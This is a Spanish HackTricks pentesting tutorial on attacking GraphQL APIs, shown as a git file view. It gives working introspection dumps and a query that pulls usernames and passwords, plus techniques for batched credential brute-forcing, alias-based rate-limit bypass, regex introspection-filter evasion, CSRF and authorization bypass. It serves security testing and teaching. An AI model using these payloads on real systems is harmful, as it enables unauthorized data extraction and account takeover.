hacktricks/network-services-pentesting/pentesting-web/graphql.md

527 lines
27 KiB
Markdown
Raw Normal View History

2023-06-05 18:33:24 +00:00
# GraphQL
<details>
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2023-06-05 18:33:24 +00:00
Otras formas de apoyar a HackTricks:
* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sigue** a **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
2023-06-05 18:33:24 +00:00
</details>
## Introducción
GraphQL actúa como una alternativa a la API REST. Las API REST requieren que el cliente envíe múltiples solicitudes a diferentes puntos finales de la API para consultar datos de la base de datos del backend. Con GraphQL solo necesitas enviar una solicitud para consultar el backend. Esto es mucho más simple porque no tienes que enviar múltiples solicitudes a la API, una sola solicitud puede ser utilizada para recopilar toda la información necesaria.
2023-06-05 18:33:24 +00:00
## GraphQL
A medida que surgen nuevas tecnologías, también lo hacen nuevas vulnerabilidades. Por **defecto** GraphQL no implementa **autenticación**, esto queda en manos del desarrollador para implementarlo. Esto significa que por defecto GraphQL permite a cualquiera consultarla, cualquier información sensible estará disponible para atacantes sin autenticación.
2023-06-05 18:33:24 +00:00
Cuando realices tus ataques de fuerza bruta de directorios, asegúrate de agregar las siguientes rutas para verificar instancias de GraphQL.
2023-06-05 18:33:24 +00:00
* `/graphql`
* `/graphiql`
* `/graphql.php`
* `/graphql/console`
* `/api`
* `/api/graphql`
* `/graphql/api`
* `/graphql/graphql`
2023-06-05 18:33:24 +00:00
<figure><img src="../../.gitbook/assets/image (6) (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
2023-06-05 18:33:24 +00:00
Una vez que encuentres una instancia abierta de GraphQL, necesitas saber **qué consultas admite**. Esto se puede hacer utilizando el sistema de introspección, más detalles se pueden encontrar aquí: [**GraphQL: Un lenguaje de consulta para APIs.**\
A menudo es útil pedir a un esquema GraphQL información sobre qué consultas admite. GraphQL nos permite hacer esto…](https://graphql.org/learn/introspection/)
2023-06-05 18:33:24 +00:00
### Huella digital
2023-06-05 18:33:24 +00:00
La herramienta [**graphw00f**](https://github.com/dolevf/graphw00f) es capaz de detectar qué motor de GraphQL se utiliza en un servidor y luego imprime información útil para el auditor de seguridad.
#### Consultas universales <a href="#universal-queries" id="universal-queries"></a>
Si envías `query{__typename}` a cualquier punto final de GraphQL, incluirá la cadena `{"data": {"__typename": "query"}}` en algún lugar de su respuesta. Esto se conoce como una consulta universal y es una herramienta útil para sondear si una URL corresponde a un servicio de GraphQL.
La consulta funciona porque cada punto final de GraphQL tiene un campo reservado llamado `__typename` que devuelve el tipo del objeto consultado como una cadena.
### Enumeración Básica
2023-06-05 18:33:24 +00:00
GraphQL generalmente admite **GET**, **POST** (x-www-form-urlencoded) y **POST**(json). Aunque por seguridad se recomienda permitir solo json para prevenir ataques CSRF.
2023-06-05 18:33:24 +00:00
#### Introspección
2023-06-05 18:33:24 +00:00
Para utilizar la introspección para descubrir información del esquema, consulta el campo `__schema`. Este campo está disponible en el tipo raíz de todas las consultas.
```bash
query={__schema{types{name,fields{name}}}}
```
```graphql
{
__schema {
types {
name
}
}
```
{% endcode %}
Con esta consulta encontrarás el nombre de todos los tipos que se están utilizando:
2023-06-05 18:33:24 +00:00
![](<../../.gitbook/assets/image (202).png>)
```bash
query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}
```
{% endcode %}
2023-06-05 18:33:24 +00:00
Con esta consulta puedes extraer todos los tipos, sus campos y sus argumentos (y el tipo de los argumentos). Esto será muy útil para saber cómo consultar la base de datos.
2023-06-05 18:33:24 +00:00
![](<../../.gitbook/assets/image (207) (3).png>)
**Errores**
Es interesante saber si los **errores** se van a **mostrar**, ya que aportarán **información** útil.
2023-06-05 18:33:24 +00:00
```
?query={__schema}
?query={}
?query={thisdefinitelydoesnotexist}
```
![](<../../.gitbook/assets/image (205) (1).png>)
**Enumerar el Esquema de la Base de Datos mediante Introspección**
2023-06-05 18:33:24 +00:00
{% hint style="info" %}
Si la introspección está habilitada pero la consulta anterior no se ejecuta, intenta eliminar las directivas `onOperation`, `onFragment` y `onField` de la estructura de la consulta.
{% endhint %}
```bash
#Full introspection query
query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
subscriptionType {
name
}
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
onOperation #Often needs to be deleted to run query
onFragment #Often needs to be deleted to run query
onField #Often needs to be deleted to run query
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
```
Consulta de introspección en línea:
2023-06-05 18:33:24 +00:00
```
/?query=fragment%20FullType%20on%20Type%20{+%20%20kind+%20%20name+%20%20description+%20%20fields%20{+%20%20%20%20name+%20%20%20%20description+%20%20%20%20args%20{+%20%20%20%20%20%20...InputValue+%20%20%20%20}+%20%20%20%20type%20{+%20%20%20%20%20%20...TypeRef+%20%20%20%20}+%20%20}+%20%20inputFields%20{+%20%20%20%20...InputValue+%20%20}+%20%20interfaces%20{+%20%20%20%20...TypeRef+%20%20}+%20%20enumValues%20{+%20%20%20%20name+%20%20%20%20description+%20%20}+%20%20possibleTypes%20{+%20%20%20%20...TypeRef+%20%20}+}++fragment%20InputValue%20on%20InputValue%20{+%20%20name+%20%20description+%20%20type%20{+%20%20%20%20...TypeRef+%20%20}+%20%20defaultValue+}++fragment%20TypeRef%20on%20Type%20{+%20%20kind+%20%20name+%20%20ofType%20{+%20%20%20%20kind+%20%20%20%20name+%20%20%20%20ofType%20{+%20%20%20%20%20%20kind+%20%20%20%20%20%20name+%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}++query%20IntrospectionQuery%20{+%20%20schema%20{+%20%20%20%20queryType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20mutationType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20types%20{+%20%20%20%20%20%20...FullType+%20%20%20%20}+%20%20%20%20directives%20{+%20%20%20%20%20%20name+%20%20%20%20%20%20description+%20%20%20%20%20%20locations+%20%20%20%20%20%20args%20{+%20%20%20%20%20%20%20%20...InputValue+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}
```
La última línea de código es una consulta graphql que volcará toda la meta-información de graphql (nombres de objetos, parámetros, tipos...)
2023-06-05 18:33:24 +00:00
![](<../../.gitbook/assets/image (206).png>)
Si la introspección está habilitada, puedes usar [**GraphQL Voyager**](https://github.com/APIs-guru/graphql-voyager) para ver en una GUI todas las opciones.
2023-06-05 18:33:24 +00:00
### Consultas
2023-06-05 18:33:24 +00:00
Ahora que sabemos qué tipo de información se guarda dentro de la base de datos, intentemos **extraer algunos valores**.
2023-06-05 18:33:24 +00:00
En la introspección puedes encontrar **qué objeto puedes consultar directamente** (porque no puedes consultar un objeto solo porque existe). En la siguiente imagen puedes ver que el "_queryType_" se llama "_Query_" y que uno de los campos del objeto "_Query_" es "_flags_", que también es un tipo de objeto. Por lo tanto, puedes consultar el objeto flag.
2023-06-05 18:33:24 +00:00
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png)
Nota que el tipo de la consulta "_flags_" es "_Flags_", y este objeto se define como a continuación:
2023-06-05 18:33:24 +00:00
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png)
Puedes ver que los objetos "_Flags_" están compuestos por **name** y **value**. Entonces puedes obtener todos los nombres y valores de las flags con la consulta:
2023-06-05 18:33:24 +00:00
```javascript
query={flags{name, value}}
```
Tenga en cuenta que si el **objeto a consultar** es un **tipo primitivo** como **string**, como en el siguiente ejemplo
2023-06-05 18:33:24 +00:00
![](<../../.gitbook/assets/image (441).png>)
Puede consultarlo simplemente con:
2023-06-05 18:33:24 +00:00
```javascript
query={hiddenFlags}
```
En otro ejemplo donde había 2 objetos dentro del objeto "_Query_": "_user_" y "_users_".\
Si estos objetos no necesitan ningún argumento para buscar, podrías **recuperar toda la información de ellos** simplemente **pidiendo** los datos que quieras. En este ejemplo de Internet podrías extraer los nombres de usuario y contraseñas guardados:
2023-06-05 18:33:24 +00:00
![](<../../.gitbook/assets/image (208).png>)
Sin embargo, en este ejemplo si intentas hacerlo obtienes este **error**:
2023-06-05 18:33:24 +00:00
![](<../../.gitbook/assets/image (210).png>)
Parece que de alguna manera buscará utilizando el argumento "_**uid**_" de tipo _**Int**_.\
De todos modos, ya sabíamos eso, en la sección [Enumeración Básica](graphql.md#basic-enumeration) se propuso una consulta que nos mostraba toda la información necesaria: `query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
2023-06-05 18:33:24 +00:00
Si lees la imagen proporcionada cuando ejecuto esa consulta verás que "_**user**_" tenía el **arg** "_**uid**_" de tipo _Int_.
2023-06-05 18:33:24 +00:00
Así que, realizando un poco de fuerza bruta ligera en _**uid**_ encontré que en _**uid**=**1**_ se recuperó un nombre de usuario y una contraseña:\
2023-06-05 18:33:24 +00:00
`query={user(uid:1){user,password}}`
![](<../../.gitbook/assets/image (211).png>)
Nota que **descubrí** que podía pedir los **parámetros** "_**user**_" y "_**password**_" porque si intento buscar algo que no existe (`query={user(uid:1){noExists}}`) obtengo este error:
2023-06-05 18:33:24 +00:00
![](<../../.gitbook/assets/image (213).png>)
Y durante la **fase de enumeración** descubrí que el objeto "_**dbuser**_" tenía como campos "_**user**_" y "_**password**_".
2023-06-05 18:33:24 +00:00
**Truco de volcado de cadena de consulta (gracias a @BinaryShadow\_)**
Si puedes buscar por un tipo de cadena, como: `query={theusers(description: ""){username,password}}` y **buscas una cadena vacía** **volcará todos los datos**. (_Nota que este ejemplo no está relacionado con el ejemplo de los tutoriales, para este ejemplo supón que puedes buscar usando "**theusers**" por un campo String llamado "**description**"_).
2023-06-05 18:33:24 +00:00
GraphQL es una tecnología relativamente nueva que está empezando a ganar tracción entre startups y grandes corporaciones. Además de la falta de autenticación por defecto, los puntos finales de GraphQL pueden ser vulnerables a otros errores como IDOR.
2023-06-05 18:33:24 +00:00
### Búsqueda
Para este ejemplo imagina una base de datos con **personas** identificadas por el correo electrónico y el nombre y **películas** identificadas por el nombre y la calificación. Una **persona** puede ser **amiga** de otras **personas** y una persona puede **tener películas**.
2023-06-05 18:33:24 +00:00
Puedes **buscar** personas **por** el **nombre** y obtener sus correos electrónicos:
2023-06-05 18:33:24 +00:00
```javascript
{
searchPerson(name: "John Doe") {
email
}
2023-06-05 18:33:24 +00:00
}
```
Puedes **buscar** personas **por** el **nombre** y obtener sus **películas** **suscritas**:
2023-06-05 18:33:24 +00:00
```javascript
{
searchPerson(name: "John Doe") {
email
subscribedMovies {
edges {
node {
name
}
}
}
}
2023-06-05 18:33:24 +00:00
}
```
Tenga en cuenta cómo se indica recuperar el `name` de los `subscribedMovies` de la persona.
2023-06-05 18:33:24 +00:00
También puede **buscar varios objetos al mismo tiempo**. En este caso, se realiza una búsqueda de 2 películas:
2023-06-05 18:33:24 +00:00
```javascript
{
searchPerson(subscribedMovies: [{name: "Inception"}, {name: "Rocky"}]) {
name
}
2023-06-05 18:33:24 +00:00
}r
```
O incluso **relaciones de varios objetos diferentes utilizando alias**:
2023-06-05 18:33:24 +00:00
```javascript
{
johnsMovieList: searchPerson(name: "John Doe") {
subscribedMovies {
edges {
node {
name
}
}
}
}
davidsMovieList: searchPerson(name: "David Smith") {
subscribedMovies {
edges {
node {
name
}
}
}
}
2023-06-05 18:33:24 +00:00
}
```
### Mutaciones
**Las mutaciones se utilizan para realizar cambios en el lado del servidor.**
En la **introspección** puedes encontrar las **mutaciones** **declaradas**. En la siguiente imagen, el "_MutationType_" se llama "_Mutation_" y el objeto "_Mutation_" contiene los nombres de las mutaciones (como "_addPerson_" en este caso):
2023-06-05 18:33:24 +00:00
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png)
Para este ejemplo, imagina una base de datos con **personas** identificadas por el correo electrónico y el nombre, y **películas** identificadas por el nombre y la calificación. Una **persona** puede ser **amiga** de otras **personas** y una persona puede **tener películas**.
2023-06-05 18:33:24 +00:00
Una mutación para **crear nuevas** películas dentro de la base de datos puede ser como la siguiente (en este ejemplo la mutación se llama `addMovie`):
2023-06-05 18:33:24 +00:00
```javascript
mutation {
addMovie(name: "Jumanji: The Next Level", rating: "6.8/10", releaseYear: 2019) {
movies {
name
rating
}
}
2023-06-05 18:33:24 +00:00
}
```
**Observe cómo tanto los valores como el tipo de datos están indicados en la consulta.**
2023-06-05 18:33:24 +00:00
También puede haber una **mutación** para **crear** **personas** (denominada `addPerson` en este ejemplo) con amigos y películas (note que los amigos y películas deben existir antes de crear una persona relacionada con ellos):
2023-06-05 18:33:24 +00:00
```javascript
mutation {
addPerson(name: "James Yoe", email: "jy@example.com", friends: [{name: "John Doe"}, {email: "jd@example.com"}], subscribedMovies: [{name: "Rocky"}, {name: "Interstellar"}, {name: "Harry Potter and the Sorcerer's Stone"}]) {
person {
name
email
friends {
edges {
node {
name
email
}
}
}
subscribedMovies {
edges {
node {
name
rating
releaseYear
}
}
}
}
}
2023-06-05 18:33:24 +00:00
}
```
### Fuerza bruta por lotes en 1 solicitud API
2023-06-05 18:33:24 +00:00
Esta información fue tomada de [https://lab.wallarm.com/graphql-batching-attack/](https://lab.wallarm.com/graphql-batching-attack/).\
Autenticación a través de la API GraphQL con **envío simultáneo de muchas consultas con diferentes credenciales** para verificarla. Es un ataque de fuerza bruta clásico, pero ahora es posible enviar más de un par de usuario/contraseña por solicitud HTTP debido a la característica de lotes de GraphQL. Este enfoque engañaría a las aplicaciones de monitoreo de tasa externa haciéndoles creer que todo está bien y que no hay un bot intentando adivinar contraseñas.
2023-06-05 18:33:24 +00:00
A continuación, puedes encontrar la demostración más simple de una solicitud de autenticación de aplicación, con **3 pares de correo electrónico/contraseña diferentes a la vez**. Obviamente, es posible enviar miles en una sola solicitud de la misma manera:
2023-06-05 18:33:24 +00:00
![](<../../.gitbook/assets/image (182) (1).png>)
Como podemos ver en la captura de respuesta, las primeras y terceras solicitudes devolvieron _null_ y reflejaron la información correspondiente en la sección de _error_. La **segunda mutación tenía los datos de autenticación correctos** y la respuesta tiene el token de sesión de autenticación correcto.
2023-06-05 18:33:24 +00:00
![](<../../.gitbook/assets/image (119) (1).png>)
## GraphQL Sin Introspección
2023-06-05 18:33:24 +00:00
Cada vez más **puntos finales de graphql están desactivando la introspección**. Sin embargo, los errores que graphql arroja cuando recibe una solicitud inesperada son suficientes para que herramientas como [**clairvoyance**](https://github.com/nikitastupin/clairvoyance) puedan recrear la mayor parte del esquema.
2023-06-05 18:33:24 +00:00
Además, la extensión de Burp Suite [**GraphQuail**](https://github.com/forcesunseen/graphquail) **observa las solicitudes de la API GraphQL que pasan por Burp** y **construye** un esquema GraphQL interno con cada nueva consulta que ve. También puede exponer el esquema para GraphiQL y Voyager. La extensión devuelve una respuesta falsa cuando recibe una consulta de introspección. Como resultado, GraphQuail muestra todas las consultas, argumentos y campos disponibles para su uso dentro de la API. Para más información [**consulta esto**](https://blog.forcesunseen.com/graphql-security-testing-without-a-schema).
Una buena **lista de palabras** para descubrir [**entidades GraphQL se puede encontrar aquí**](https://github.com/Escape-Technologies/graphql-wordlist?).
### Eludiendo las defensas de introspección de GraphQL <a href="#bypassing-graphql-introspection-defences" id="bypassing-graphql-introspection-defences"></a>
2023-06-05 18:33:24 +00:00
Si no puedes hacer que las consultas de introspección se ejecuten para la API que estás probando, intenta insertar un **carácter especial después de la palabra clave `__schema`**.
Cuando los desarrolladores desactivan la introspección, podrían usar una expresión regular para excluir la palabra clave `__schema` en las consultas. Deberías probar caracteres como **espacios**, **nuevas líneas** y **comas**, ya que son **ignorados** por GraphQL pero no por expresiones regulares defectuosas.
Como tal, si el desarrollador solo ha excluido `__schema{`, entonces la siguiente consulta de introspección no sería excluida.
```bash
#Introspection query with newline
{
"query": "query{__schema
{queryType{name}}}"
}
```
Si esto no funciona, intente ejecutar la sonda sobre un método de solicitud alternativo, ya que la introspección solo puede estar deshabilitada para POST. Pruebe una solicitud GET o una solicitud POST con un tipo de contenido de `x-www-form-urlencoded`.
### Estructuras GraphQL Filtradas
Si la introspección está deshabilitada, intente mirar el código fuente del sitio web. Las consultas a menudo se cargan previamente en el navegador como bibliotecas de javascript. Estas consultas preescritas pueden revelar información valiosa sobre el esquema y el uso de cada objeto y función. La pestaña `Sources` de las herramientas para desarrolladores puede buscar en todos los archivos para enumerar dónde se guardan las consultas. A veces, incluso las consultas protegidas por el administrador ya están expuestas.
```javascript
Inspect/Sources/"Search all files"
file:* mutation
file:* query
```
2023-06-05 18:33:24 +00:00
## CSRF en GraphQL
Si no sabes qué es CSRF, lee la siguiente página:
2023-06-05 18:33:24 +00:00
{% content-ref url="../../pentesting-web/csrf-cross-site-request-forgery.md" %}
[csrf-cross-site-request-forgery.md](../../pentesting-web/csrf-cross-site-request-forgery.md)
{% endcontent-ref %}
Encontrarás varios puntos finales de GraphQL **configurados sin tokens de CSRF.**
2023-06-05 18:33:24 +00:00
Ten en cuenta que las solicitudes de GraphQL generalmente se envían a través de peticiones POST utilizando el Content-Type **`application/json`**.
2023-06-05 18:33:24 +00:00
```javascript
{"operationName":null,"variables":{},"query":"{\n user {\n firstName\n __typename\n }\n}\n"}
```
Sin embargo, la mayoría de los puntos finales de GraphQL también admiten **`form-urlencoded` solicitudes POST:**
2023-06-05 18:33:24 +00:00
```javascript
query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A
```
Por lo tanto, como las solicitudes CSRF como las anteriores se envían **sin solicitudes de preflight**, es posible **realizar** **cambios** en el GraphQL abusando de un CSRF.
2023-06-05 18:33:24 +00:00
Sin embargo, ten en cuenta que el nuevo valor predeterminado de la cookie para la bandera `samesite` de Chrome es `Lax`. Esto significa que la cookie solo se enviará desde una web de terceros en solicitudes GET.
2023-06-05 18:33:24 +00:00
Ten en cuenta que generalmente es posible enviar la **solicitud** **de consulta** también como una **solicitud GET y el token CSRF podría no estar validado en una solicitud GET.**
2023-06-05 18:33:24 +00:00
Además, abusando de un **ataque** [**XS-Search**](../../pentesting-web/xs-search.md) podría ser posible exfiltrar contenido del punto final de GraphQL abusando de las credenciales del usuario.
2023-06-05 18:33:24 +00:00
Para más información **consulta la** [**publicación original aquí**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html).
2023-06-05 18:33:24 +00:00
## Autorización en GraphQL
2023-06-05 18:33:24 +00:00
Muchas funciones de GraphQL definidas en el punto final solo podrían verificar la autenticación del solicitante, pero no la autorización.
2023-06-05 18:33:24 +00:00
Modificar las variables de entrada de la consulta podría llevar a que se [filtren](https://hackerone.com/reports/792927) detalles sensibles de la cuenta.
2023-06-05 18:33:24 +00:00
La mutación incluso podría llevar a la toma de control de la cuenta intentando modificar otros datos de la cuenta.
2023-06-05 18:33:24 +00:00
```javascript
{
"operationName":"updateProfile",
"variables":{"username":INJECT,"data":INJECT},
"query":"mutation updateProfile($username: String!,...){updateProfile(username: $username,...){...}}"
2023-06-05 18:33:24 +00:00
}
```
### Eludir la autorización en GraphQL
2023-06-05 18:33:24 +00:00
[Encadenar consultas](https://s1n1st3r.gitbook.io/theb10g/graphql-query-authentication-bypass-vuln) juntas puede eludir un sistema de autenticación débil.
2023-06-05 18:33:24 +00:00
En el siguiente ejemplo, puedes ver que la operación es "forgotPassword" y que solo debería ejecutar la consulta forgotPassword asociada con ella. Esto se puede eludir agregando una consulta al final, en este caso agregamos "register" y una variable de usuario para que el sistema registre a un nuevo usuario.
2023-06-05 18:33:24 +00:00
<figure><img src="../../.gitbook/assets/GraphQLAuthBypassMethod.PNG" alt=""><figcaption></figcaption></figure>
## Eludir el límite de tasa usando alias
2023-06-05 18:33:24 +00:00
Normalmente, los objetos GraphQL no pueden contener múltiples propiedades con el mismo nombre. Los alias te permiten eludir esta restricción **nombrando explícitamente las propiedades que deseas** que la API devuelva. Puedes usar alias para devolver **múltiples instancias del mismo** tipo de objeto en una sola solicitud.
Para obtener más información sobre los alias de GraphQL, consulta [Aliases](https://portswigger.net/web-security/graphql/what-is-graphql#aliases).
Aunque los alias están destinados a limitar la cantidad de llamadas a la API que necesitas hacer, también se pueden usar para forzar bruscamente un punto final de GraphQL.
Muchos puntos finales tendrán algún tipo de **limitador de tasa en su lugar para prevenir ataques de fuerza bruta**. Algunos limitadores de tasa funcionan en base al **número de solicitudes HTTP** recibidas en lugar del número de operaciones realizadas en el punto final. Debido a que los alias efectivamente te permiten enviar múltiples consultas en un solo mensaje HTTP, pueden eludir esta restricción.
El ejemplo simplificado a continuación muestra una serie de **consultas con alias que verifican si los códigos de descuento de una tienda son válidos**. Esta operación podría potencialmente eludir la limitación de tasa ya que es una sola solicitud HTTP, aunque podría usarse para verificar un gran número de códigos de descuento a la vez.
```bash
#Request with aliased queries
query isValidDiscount($code: Int) {
isvalidDiscount(code:$code){
valid
}
isValidDiscount2:isValidDiscount(code:$code){
valid
}
isValidDiscount3:isValidDiscount(code:$code){
valid
}
}
2023-06-05 18:33:24 +00:00
```
## Herramientas
### Escáneres de vulnerabilidades
* [https://github.com/gsmith257-cyber/GraphCrawler](https://github.com/gsmith257-cyber/GraphCrawler): Kit de herramientas que se puede utilizar para capturar esquemas y buscar datos sensibles, probar la autorización, fuerza bruta en esquemas y encontrar caminos hacia un tipo dado.
* [https://blog.doyensec.com/2020/03/26/graphql-scanner.html](https://blog.doyensec.com/2020/03/26/graphql-scanner.html): Se puede utilizar como independiente o [extensión de Burp](https://github.com/doyensec/inql).
* [https://github.com/swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap): Se puede utilizar como cliente CLI también para automatizar ataques.
* [https://gitlab.com/dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum): Herramienta que enumera las diferentes formas de alcanzar un tipo dado en un esquema GraphQL.
* [https://github.com/doyensec/inql](https://github.com/doyensec/inql): Extensión de Burp para pruebas avanzadas de GraphQL. El _**Scanner**_ es el núcleo de InQL v5.0, donde puedes analizar un punto final de GraphQL o un archivo de esquema de introspección local. Genera automáticamente todas las posibles consultas y mutaciones, organizándolas en una vista estructurada para tu análisis. El componente _**Attacker**_ te permite ejecutar ataques GraphQL por lotes, lo cual puede ser útil para eludir límites de tasa implementados de manera deficiente.
2023-06-05 18:33:24 +00:00
### Clientes
* [https://github.com/graphql/graphiql](https://github.com/graphql/graphiql): Cliente GUI
* [https://altair.sirmuel.design/](https://altair.sirmuel.design/): Cliente GUI
2023-06-05 18:33:24 +00:00
### Pruebas Automáticas
2023-06-05 18:33:24 +00:00
{% embed url="https://graphql-dashboard.herokuapp.com/" %}
* Video explicando AutoGraphQL: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU)
2023-06-05 18:33:24 +00:00
## Referencias
* [**https://jondow.eu/practical-graphql-attack-vectors/**](https://jondow.eu/practical-graphql-attack-vectors/)
* [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)
* [**https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4**](https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4)
* [**http://ghostlulz.com/api-hacking-graphql/**](http://ghostlulz.com/api-hacking-graphql/)
* [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md)
2023-06-05 18:33:24 +00:00
* [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)
* [**https://portswigger.net/web-security/graphql**](https://portswigger.net/web-security/graphql)
2023-06-05 18:33:24 +00:00
<details>
<summary><strong>Aprende a hackear AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Otras formas de apoyar a HackTricks:
2023-06-05 18:33:24 +00:00
* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
2023-06-05 18:33:24 +00:00
</details>